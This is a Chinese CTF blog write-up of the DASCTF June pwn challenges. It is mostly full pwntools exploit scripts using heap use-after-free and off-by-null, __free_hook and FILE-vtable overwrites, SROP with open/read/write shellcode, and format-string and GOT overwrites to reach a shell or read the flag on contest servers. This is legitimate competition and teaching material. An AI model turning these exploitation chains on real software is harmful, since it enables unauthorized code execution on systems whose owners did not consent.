Dasctf 6月赛其余pwn WP

最新推荐文章于 2023-06-05 19:18:21 发布
最新推荐文章于 2023-06-05 19:18:21 发布
阅读量554 收藏
点赞数
分类专栏: pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31457355/article/details/106984989
版权
copy:

这题主要是堆风水的利用,通过运行我们可以发现,每次申请块之后都会free掉这个块,但是接下来执行删除操作的时候我们还可以利用这个指针因此存在uaf漏洞,剩下的就是堆风水的利用了,不再赘述
exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#from LibcSearcher import LibcSearcher
# context.log_level = 'debug'

binary = 'copy11'
elf = ELF('copy11')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
  # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
  host = "183.129.189.60"
  port =  10034
  p = remote(host,port)
o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
magic = [0x3c4b10,0x3c67a8,0x846c0,0x45390]#malloc,free,realloc,system
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
def cmd(idx):
	sla("choice:",str(idx))
def add(idx,size,payload):
	cmd(idx)
	if idx == 1:
		cmd(1)
		sla("input size:",str(size))
		sa("input data:",payload)
	else:
		cmd(1)
		sa("input data:",payload)
def free(idx,idx1):
	cmd(idx)
	cmd(2)
	sla("index?\n",str(idx1))
def show(idx,idx1):
	cmd(idx)
	cmd(3)
	sla("index?\n",str(idx1))

add(1,0x90,"a")
free(1,0)
add(1,0x90,"aaa")
show(1,0)
ru("data: ")
heap_addr = u64(p.recv(6).ljust(8,"\x00"))
lg("heap_addr",heap_addr)
add(1,0x90,p64(heap_addr-0x11f00-0xb0+0x10))
free(1,0)
free(1,1)
add(2,0x90,p64(heap_addr-0x11e00-0xb0+0x10))
payload = p64(0x101)+p64(0x0108)
payload += p64(0)*6
payload += p64(heap_addr-0x11e00-0xb0+0x10+0x60)
payload += p64(heap_addr+0xa0)
payload += p64(0)+p64(0x31)
payload += p64(0)*3+p64(0x21)
payload += p64(heap_addr+0xb0+0x10-0x20)
payload += p64(heap_addr-0x11e00-0xb0+0x10+0x50)
add(2,0x90,payload)
show(1,0)
libc_base = l64()-0x3ebca0
lg("libc_base",libc_base)
free_hook = libc_base+libc.sym["__free_hook"]
sys_addr = libc_base+libc.sym["system"]
payload = p64(0)*5+p64(0x31)+p64(0)*5
o_g = [0x4f2c5,0x4f322,0x10a38c]
one = o_g[1]+libc_base
free(2,1)
add(2,0x90,payload)
add(1,0x18,p64(free_hook)*3)
free(1,1)
add(1,0x60,p64(one))
# gdb.attach(p)
p.interactive()
easyheap:
溢出点:

libc2.27下的off by null可以参考cnitlrt,本题和我的简书上的第二个题的利用手法类似加了个沙盒:
exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#from LibcSearcher import LibcSearcher
# context.log_level = 'debug'

binary = 'ezheap'
elf = ELF('ezheap')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
  # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
  host = "183.129.189.60"
  port =  10027
  p = remote(host,port)
o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
magic = [0x3c4b10,0x3c67a8,0x846c0,0x45390]#malloc,free,realloc,system
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
def cmd(idx):
	sla("Your Choice: ",str(idx))
def add(idx,size,payload):
	cmd(1)
	sla("index>> ",str(idx))
	sla("size>> ",str(size))
	sa('name>> ',payload)
def free(idx):
	cmd(2)
	sla("index>> ",str(idx))
def show(idx):
	cmd(3)
	sla("index>> ",str(idx))
def edit(idx,payload):
	cmd(4)
	sla("index>> ",str(idx))
	sa('name>> ',payload)
for i in range(7):
    add(i,0x68,"aaaa")
for i in range(7):
    add(i+7,0xf8,"aaaa")
add(14,0xf8,"aaaa")#14
add(15,0x68,"aaaa")#15
add(16,0xf8,"aaaa")#16
add(17,0x68,"aaaa")#17
for i in range(14):
    free(i)
free(15)
free(14)
add(0,0x68,"a"*0x60+p64(0x100+0x70))
free(16)
add(19,0x110,"a"*0xf0+p64(0)+p64(0x101))
add(18,0x140,"aaaa")
edit(18,"a"*0xd0+p64(0)+p64(0x21)+p64(0)+p64(0x21)*3)
free(0)
show(19)
libc_base = l64()-0x3ebca0
lg("libc_base",libc_base)
free_hook = libc_base+libc.sym["__free_hook"]
setcontext = 0x520a5+libc_base
edit(19,"\x00"*0xf0+p64(0)+p64(0x101)+p64(0)+p64(free_hook-0x20))
add(0,0xf8,"\x00")
edit(19,"\x00"*0xf0+p64(0)+p64(0x71))
edit(18,"\x00"*0x40+p64(0)+p64(0x21)*3)
free(0)
edit(19,"\x00"*0xf0+p64(0)+p64(0x71)+p64(free_hook-0x13))
add(0,0x68,"\x00")
add(1,0x68,"\x00"*3+p64(setcontext))
free_hook1 = free_hook&0xfffffffffffff000
syscall = 0x00000000000d2975+libc_base
pop_rdi = 0x000000000002155f+libc_base
pop_rsi = 0x0000000000023e6a+libc_base
pop_rdx = 0x0000000000001b96+libc_base
pop_rax = 0x00000000000439c8+libc_base
payload = [pop_rdi,free_hook1,pop_rsi,0x2000,pop_rdx,0x7,pop_rax,10,syscall,0x0000000000002b1d+libc_base]
frame = SigreturnFrame()
frame.rdi = 0
frame.rsi = free_hook1
frame.rdx = 0x2000
frame.rsp = free_hook1
frame.rip = syscall
fa = str(frame)
edit(18,fa)
free(18)
sc = """
mov rax, 0x67616c662f
push rax

mov rdi, 0
mov rsi, rsp
mov rdx, 0
mov rax, SYS_openat
syscall				;//openat(0, "/flag", 0)

mov rdi, rax
mov rsi, rsp
mov rdx, 0x100		
mov rax, SYS_read
syscall				;//read(fp, rsp, 0x100)

mov rdi, 1
mov rsi, rsp
mov rdx, 0x100
mov rax, SYS_write
syscall				;//write(1, rsp, 0x100)

mov rax, SYS_exit
syscall
"""	
payload = flat(payload) + asm(sc)
# gdb.attach(p)
p.send(payload)
p.interactive()
oooooorder

加了沙盒,程序的漏洞点在:

使用realloc,realloc有个特性是当size为0的时候会free掉当前堆块,由此可以造成uaf,因此:
exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#from LibcSearcher import LibcSearcher
# context.log_level = 'debug'

binary = 'oooorder'
elf = ELF('oooorder')
libc = elf.libc
context.binary = binary

DEBUG = 1
if DEBUG:
  p = process(binary)
  # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
  host = "183.129.189.60"
  port =  10028
  p = remote(host,port)
o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
magic = [0x3c4b10,0x3c67a8,0x846c0,0x45390]#malloc,free,realloc,system
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
def cmd(idx):
	sla("Your choice :\n",str(idx))
def add(size,payload):
	cmd(1)
	sla("How much is the order?\n",str(size))
	sa("Order notes:\n",payload)
def show():
	cmd(3)
def edit(idx,payload):
	cmd(2)
	sla("Index of order:\n",str(idx))
	sa("Order notes:\n",payload)
def free(idx):
	cmd(4)
	sla("Index of order:\n",str(idx))
for i in range(10):
	add(0x400,"aaaa")
free(0)
free(1)
add(0x400,"\xa0")
show()
ru("[0]:")
heap_base = u64(p.recv(6).ljust(8,"\x00"))-0x2a0
lg("heap_base",heap_base)
add(0x400,"\xa0")
for i in range(7):
	free(i+3)
for i in range(8):
	add(0x18,"dddd")
for i in range(7):
	free(i+3)
free(0)
for i in range(7):
	add(0x400,"\xa0")
free(10)
add(0x400,"a"*0x8)
show()
libc_base = l64()-0x3ebca0
lg("libc_base",libc_base)
free_hook = libc_base+libc.sym["__free_hook"]
setcontext = libc_base+0x520a5
free_hook1 = free_hook&0xfffffffffffff000
add(0,"")#10
add(18,"aaa")#11
free(11)
cmd(2)
syscall = 0x00000000000d2975+libc_base
pop_rdi = libc_base+0x000000000002155f
pop_rsi = libc_base+0x0000000000023e6a
pop_rdx = libc_base+0x0000000000001b96
pop_rax = libc_base+0x00000000000439c8
p.recv()
p.sendline("10")
free(10)
add(0x20,p64(free_hook))
add(0x20,"aaa")
add(0x18,p64(setcontext))
frame = SigreturnFrame()
frame.rdi = 0
frame.rsi = free_hook1
frame.rdx = 0x2000
frame.rsp = free_hook1
frame.rip = syscall
fr = str(frame)
payload = [pop_rdi,free_hook1,pop_rsi,0x2000,pop_rdx,0x7,pop_rax,10,syscall,0x0000000000002b1d+libc_base]
edit(4,fr)
free(4)
sc = shellcraft.open("flag",0)
sc += shellcraft.read("rax",free_hook1+0x400,0x100)
sc += shellcraft.write(1,free_hook1+0x400,0x100)
payload = flat(payload)+asm(sc)
p.send(payload)
# gdb.attach(p)
p.interactive()
secret:

程序有任意地址写的漏洞,而后用fclose关闭所有流,意图很明显了就是让我们分析fclose,在我们一步一步跟进的时候发现有两个地方是我们可以控制的地方,第一个是:

对应:

此时的rbp指向vtable,因此我们可以在_IO_file_jump+0x88的位置填上one_gadget完成利用
第二个是:
对应:
因此我们可以在_io_file_jumps的0x10的位置上写上one_gadget完成利用,具体根据自己的调试吧:
exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#from LibcSearcher import LibcSearcher
# context.log_level = 'debug'

binary = 'secret'
elf = ELF('secret')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
  # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
  host = "183.129.189.60"
  port =  10030
  p = remote(host,port)
# o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
# magic = [0x3c4b10,0x3c67a8,0x846c0,0x45390]#malloc,free,realloc,system
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
"""
0xe237f execve("/bin/sh", rcx, [rbp-0x70])
constraints:
  [rcx] == NULL || rcx == NULL
  [[rbp-0x70]] == NULL || [rbp-0x70] == NULL

0xe2383 execve("/bin/sh", rcx, rdx)
constraints:
  [rcx] == NULL || rcx == NULL
  [rdx] == NULL || rdx == NULL

0xe2386 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL

0x106ef8 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
"""
o_g = [0xe237f,0xe2383,0xe2386,0x106ef8,0x106f04]
ru("0x")
libc_base = int(p.recv(12),16)-libc.sym["printf"]
lg("libc_base",libc_base)
addr = libc.sym["_IO_2_1_stderr_"]+libc_base+0xd8
addr1 = 0x1e5960+libc_base
addr1 = addr1&0xffff
sys_addr =libc_base+libc.sym["system"]
one = o_g[2]+libc_base
payload = p64(one)*3
p.recv()
p.send(p64(addr))
p.send(p16(addr1))
# gdb.attach(p)
p.send(payload)
p.interactive()

延申:
在我们一步步跟踪的时候我们可以发现那两个位置的rdx都指向了_IO_helper_jumps,我们知道在libc2.29的版本下setcontext函数参数并非是常规的rdi而是rdx因此我们可以利用这一点来完成libc2.29下的setcontext的利用。

spirngbord

非栈上的格式化字符串漏洞利用:
exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#from LibcSearcher import LibcSearcher
#context.log_level = 'debug'

binary = 'springboard'
elf = ELF('springboard')
libc = elf.libc
context.binary = binary

DEBUG = 0
if DEBUG:
  p = process(binary)
  # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
  host = "183.129.189.60"
  port =  10029
  p = remote(host,port)
o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
magic = [0x3c4b10,0x3c67a8,0x846c0,0x45390]#malloc,free,realloc,system
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
o_g = [0x4f2c5,0x4f322,0x10a38c]
payload = "%11$p-%13$p-%39$p"
p.recv()
p.sendline(payload)
ru("0x")
libc_base = int(p.recv(12),16)-0x21b97
lg("libc_base",libc_base)
ru("0x")
addr13 = int(p.recv(12),16)
ru("0x")
addr39 = int(p.recv(12),16)
lg("addr13",addr13)
lg("addr39",addr39)
ret_addr = (addr13-0xe0)
lg("ret_addr",ret_addr)
one = libc_base+o_g[0]
addr1 = one&0xffff
payload = "%{}c%{}$hn".format((ret_addr+2)&0xffff,13)
ru("input your name:")
p.sendline(payload)
# ru("cnit")
ru("input your name:")
payload = "%{}c%{}$hhnCnit\x00".format((one>>16)&0xff,39)
p.sendline(payload)
ru("Cnit")
ru("input your name:")
payload = "%{}c%{}$hhnCnit".format(ret_addr&0xffff,13)
p.sendline(payload)
ru("Cnit")
ru("input your name:")
payload = "%{}c%{}$hnCnit".format(one&0xffff,39)
p.sendline(payload)
ru("Cnit")
ru("input your name:")
p.sendline("\x00"*0x50)
# gdb.attach(p)
p.interactive()
Memory_Monster_IV

数组上溢修改write的got表为one_gadget,getshell之后使用exec 1>&2来重定向

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#from LibcSearcher import LibcSearcher
context.log_level = 'debug'

binary = 'Memory_Monster_IV'
elf = ELF('Memory_Monster_IV')
libc = ELF("libc-2.30.so")
context.binary = binary

DEBUG = 1
if DEBUG:
  p = process(binary)
  # p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})
else:
  host = ""
  port =  0
  p = remote(host,port)
o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
magic = [0x3c4b10,0x3c67a8,0x846c0,0x45390]#malloc,free,realloc,system
l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b  :p.sendlineafter(str(a),str(b))
sa  = lambda a,b  :p.sendafter(str(a),str(b))
lg  = lambda name,data : p.success(name + ": 0x%x" % data)
se  = lambda payload: p.send(payload)
rl  = lambda      : p.recv()
sl  = lambda payload: p.sendline(payload)
ru  = lambda a     :p.recvuntil(str(a))
libc_base = l64()-libc.sym["execve"]
libc_base =libc_base&0xfffffffffffff000
lg("libc_base",libc_base)
write_addr = libc_base+libc.sym["write"]
one = 0x10afa4+libc_base
addr1 = one&0xff
addr2 = one>>8
addr2 = addr2&0xff
lg("addr1",addr1)
sla("index:","-7624")
p.recv()
p.sendline(str(hex((addr1))))
sla("index:","-7623")
p.recv()
p.sendline(strhex((addr2)))
p.interactive()
cnitlrt
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Bugku S3 AWD排位-9 pwn二进制
08-27
Bugku S3 AWD排位-9 pwn二进制
2023 年重庆市大学生信息安全竞线上初 | PWN
最新发布
weixin_51890658的博客
10-28 308
1.babyshell2.just_read1.babyshellnx关闭了的,堆栈可读可写可执行,拖入ida分析在初始化时开了沙盒,这些为黑名单,不能使用,本来想用open,read,write来获取flag的,但是禁用了open(调用号为2),还好可以使用openat,它的调用号为257int openat(int dirfd, const char *pathname, int flags, mode_t mode)如果pathname指定的是绝对路径。这种情况下,dirfd参数将被忽略,openat
2021第十四届全国大学生信息安全竞WP(CISCN)-- pwn部分
热门推荐
lifanxin的博客
05-17 1万+
CISCN_2021_WP概述ciscn_2021_lonelywolf总结 概述   作为学习不到一年的练习生,今年第一次参加国,本以为题目会比较温柔,但是最后只做出了一道pwn题,本来还有两道pwn题是有机会的,但还是缺少一些知识或者技巧吧,没做出来,然后就结束了。本次国pwn题出了一道arm 64位结构的,其余都是正常的linux下pwn题,使用libc-2.27.so,有一道考了沙箱机制。 ciscn_2021_lonelywolf   ciscn_2021_lonelywolf   libc-
[DASCTF 2023六月挑战|二进制专项] 5个pwn
weixin_52640415的博客
06-04 1202
格式化字符串漏洞利用argv链 6次free的off_by_null printf改system
DASCTF 2023六月挑战|二进制专项 PWN
weixin_51890658的博客
06-05 355
通过ida分析和gdb调试i在rbp-c中,它是int类型占4字节,还有两次格式化字符串漏洞,可通过这两次修改为i的值,第一次是把args参数链修改为i地址,第二次是修改i值即可再次使用格式化字符串漏洞。因为有堆溢出和uaf,可以伪装fastchunk,通过gdb调试0x602095地址的值为0x7f,可伪装。64位,也给了libc库,开了canary和pie地址随机 拖入ida看存在格式化字符串漏洞,有3次。64位的,给了libc库,开了canary,拖入ida分析,在edit函数中存在堆溢出。
DASCTF 7月赋能pwn wp
N1rvana的博客
07-25 479
DASCTF 7月赋能pwn wp
ctf比中收集的pwn,并制作write-up。.zip
09-30
项目源码
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
2020 蓝帽杯线下PWN WriteUp .pdf
09-05
2020 蓝帽杯线下PWN WriteUp 安全测试 企业安全 安全架构 自动化 安全防御
DASCTF X GFCTF 2022十月挑战 - pwn
z1r0的博客
10-28 835
所以思路很好想出来,首先可以利用rax来控制rsi进行read任意写,再利用rax控制rsi到read_got这里进行任意地址写,写成syscall。这个时候我们把rax设置成0x3b也就是execve,控制rdi为bin_sh,把rsi和rdx置为0,最后直接调用read就可以getshell了。发现了这一个gadget,而404018正好是bss的地址,可读可写,所以我们可以利用上面第一次的任意地址写将bss这里的地址写成bin_sh。这里的地方,并且最后还可以控制ret。
House of apple 一种新的glibc中IO攻击方法
pythonxxoo的博客
06-18 2888
目录* House of apple 一种新的glibc中IO攻击方法 + 前言 + 利用条件 + 利用原理 + 利用思路 - 思路一:修改线程变量 - 思路二:修改结构体 - 思路三:修改线程变量之 - 思路四:修改全局变量 + 例题分析 - 题目分析 - 利用过程 + 总结提出一种新的中利用思路,暂且命名为。众所周知,高版本逐渐移除了等等一众全局变量,中题对钩子的利用将逐渐成为过去式。而想要在高版本利用成功,基本上就离不开对结构体的伪造与流的攻击。之前很多师傅都提出了一些优秀的攻击方法,比如house
house of kiwi利用
m0_63437215的博客
11-05 584
house of kiwi (dest0g3 520招新
DASCTF 6月部分pwn wp
starssgo的博客
06-27 1080
感觉质量挺高的,有点昏迷, 目录Memory-Monster-IVoooooordereasyheapspringboardsecret写在最后 Memory-Monster-IV 这个题我是真的服了,恶心了我一天时间,最后还是没出,知道是要改got表,而且每次只能改一个字节,第一次改后变成ret之类的无用函数,我是不想说啥,没复现出来,贴下作者的分析把: http://taqini.space/2020/06/26/DASCTF-June-Memory-Monster-IV-200pt/ 我感觉能学到的东
DASCTF六月团队(2020)-部分WP
~airrudder~
06-27 4018
本篇内容 MISC: Keyboard 透明度 Crypto: Gemini_Man Web: 简单的计算题1 简单的计算题2 phpuns Reverse: easy_maze 上一篇 | 目录 | 下一篇 刚打了DASCTF六月团队,情况虽不是很理想,但也记录一下团队解题情况。 Keyboard 尝试了很久发现没思路,搜索一下,发现是安恒DASCTF 四月战原题,甚至连flag都没变。 //查找含“keyboard”的文件 volatility -f Keyboard.raw .
DASCTF2020-7月 部分wp(misc,pwn,crypto)
ATFWUS的博客
07-25 1926
五个小时,刚好把杂项,密码学,pwn的签到题做出来了,哈哈哈,wp记录一下。 比时间:2020-07-25 10:00-15:00 0x01.MISC - welcome to the misc world 文件下载 :链接:https://pan.baidu.com/s/1QfoFQUORH5n0zTEdHNXiAw 提取码:FWUS 考点: 1.lsb隐写与zsteg的使用 2.Nfts隐写 3.base85加密 下载得到的是一个rar文件。 解压的得到一张图片和一个压缩包,压缩包.
DASCTF 7月部分pwn
starssgo的博客
07-25 1386
做了pwn1跟pwn3,pwn2没做出来(俺是废物)… pwn1 签到题,但是我们要记住 .text:080485F8 mov eax, 0 .text:080485FD mov ecx, [ebp+var_4] .text:08048600 leave .text:08048601 lea esp, [ecx-4] .text:08048604
DASCTF 虚假的签到
qq_45631641的博客
07-25 436
格式化字符串 栈溢出 调试得%2$x时为栈地址 from pwn import * context.log_level='debug' #sh=process('./qiandao') sh=remote('183.129.189.60','10013') sh.recv() sh.sendline('%2$x') t=sh.recv(8) print t sh.recv() sleep(0.2) print t x=int(t,16) ret=0x0804857D sh.sendline('a'*0x.
DASCTF&NepCTF 部分writeup
weixin_44145820的博客
06-26 4297
目录PWNoooorderspringboardeasyheap(本地成功)RET0p GearpyCharm521MagiaMISC透明度 PWN oooorder 一道不太复杂的题目,利用点都是之前遇到的,运气好拿到了一血 edit中进行了realloc,如果size为0就会执行free,利用这个进行double free,由于禁用了execve,需要用setcontext执行mprotect并执行orw的shellcode 关于orw部分,具体请见这篇博客:BUUCTF-PWN rctf_2019_
buuctf pwn
10-01
buuctf pwn是指一个CTF比中的pwn题目,其中包含了经典的栈溢出漏洞、ret2system和ret2text的漏洞利用方法。在栈溢出漏洞中,通过向缓冲区中输入超过其容量的数据,覆盖掉程序的返回地址,从而控制程序的执行流程。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值